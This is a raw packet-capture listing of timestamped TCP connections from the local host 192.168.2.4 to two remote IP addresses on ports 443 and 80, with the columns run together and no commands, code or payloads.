                                                                                                                Oct 8, 2024 05:00:02.318975925 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.319014072 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.319024086 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.319051981 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.319097996 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.319870949 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.319890022 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.319925070 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.319935083 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.319960117 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.319977045 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.322905064 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.322922945 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.322973967 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.322983980 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.323009968 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.323025942 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.343064070 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.343084097 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.343151093 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.343161106 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.343194008 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.345165014 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.351452112 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.351532936 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.351593971 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.351593971 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.351630926 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.351677895 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.351686001 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.351746082 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.352026939 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.352056026 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.713403940 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.713429928 CEST4434979349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.713495970 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.713670969 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.713686943 CEST4434979349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:03.370173931 CEST4434979349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:03.370299101 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:03.370584965 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:03.370604038 CEST4434979349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:03.372437000 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:03.372447968 CEST4434979349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:03.372482061 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:03.372490883 CEST4434979349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:03.902201891 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:03.902292013 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:03.902369022 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:03.902520895 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:03.902548075 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:04.086806059 CEST4434979349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:04.086858034 CEST4434979349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:04.086903095 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:04.086903095 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:04.087606907 CEST49793443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:04.087640047 CEST4434979349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:04.549455881 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:04.549674034 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:04.550122023 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:04.550174952 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:04.551533937 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:04.551590919 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.243089914 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.243145943 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.243213892 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.243213892 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.243279934 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.243321896 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.243341923 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.243381023 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.243527889 CEST49802443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.243557930 CEST4434980249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.245799065 CEST49812443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.245851040 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.245964050 CEST49812443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.246148109 CEST49812443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.246169090 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.905177116 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.905360937 CEST49812443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.905644894 CEST49812443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.905658007 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:05.907218933 CEST49812443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:05.907229900 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:06.611779928 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:06.611831903 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:06.611907005 CEST49812443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:06.611927032 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:06.611959934 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:06.612009048 CEST49812443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:06.612090111 CEST49812443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:06.612103939 CEST4434981249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:06.630872011 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:06.630901098 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:06.630958080 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:06.631113052 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:06.631124973 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:07.445456028 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:07.445566893 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:07.446084976 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:07.446093082 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:07.449415922 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:07.449425936 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126091957 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126178980 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.126200914 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126254082 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.126260042 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126303911 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.126323938 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126379967 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.127089977 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.127103090 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.695935011 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.696028948 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.696309090 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.696722031 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.696793079 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.361290932 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.361393929 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.361875057 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.361901999 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.364181995 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.364195108 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.364352942 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.364383936 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.364514112 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.364553928 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.364700079 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.364912987 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.365119934 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.365159035 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.365159035 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.365179062 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.365227938 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.365241051 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.694396973 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.694556952 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.694684029 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.694835901 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.694875002 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.698497057 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.698537111 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.698616028 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.698833942 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.698849916 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:11.344247103 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:11.344325066 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:11.344630003 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:11.344641924 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:11.345999002 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:11.346004963 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.076208115 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.076309919 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:12.076327085 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.076371908 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:12.076374054 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.076426983 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:12.076556921 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:12.076570034 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.078641891 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.083444118 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.083513975 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.083702087 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.088577986 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784432888 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784471035 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784503937 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784535885 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784568071 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784599066 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784631014 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784662962 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784693956 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784725904 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784733057 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.784733057 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.784770012 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.784770012 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.784795046 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.789611101 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.789644003 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.789719105 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.912139893 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912178993 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912199020 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.912226915 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.912230015 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912281036 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912296057 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.912314892 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912324905 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.912348986 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912357092 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.912389994 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.912828922 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912880898 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912929058 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912930965 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.912962914 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.912970066 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.912995100 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.913003922 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.913033009 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.913597107 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.913646936 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.913681030 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.913697004 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.913712978 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.913721085 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.913746119 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.913753033 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.913784981 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.914388895 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.914437056 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.914438009 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.914472103 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.914478064 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.914504051 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.914510012 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.914537907 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.914541960 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.914577961 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.915260077 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.915307045 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.917397976 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.917429924 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.917448044 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.917464018 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.917471886 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.917515993 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.040998936 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041037083 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041091919 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041106939 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041107893 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041121006 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041155100 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041182995 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041182995 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041189909 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041208029 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041223049 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041239023 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041265965 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041316032 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041363955 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041407108 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041454077 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041568041 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041599989 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041631937 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041649103 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041666031 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041678905 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041699886 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041702986 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041733027 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041753054 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041765928 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.041769028 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.041800976 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042015076 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042063951 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042066097 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042105913 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042114019 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042146921 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042148113 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042177916 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042181015 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042211056 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042213917 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042248011 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042479038 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042510033 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042531013 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042548895 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042558908 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042591095 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042598963 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042623997 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042629957 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042655945 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042661905 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042687893 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042694092 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042720079 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042726040 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042752028 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042757988 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042784929 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042790890 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042817116 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042846918 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042851925 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.042859077 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.042896986 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043354988 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043402910 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043431044 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043462992 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043476105 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043507099 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043524981 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043556929 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043569088 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043590069 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043600082 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043622017 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043632030 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043656111 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043665886 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043688059 CEST8049857185.215.113.117192.168.2.4
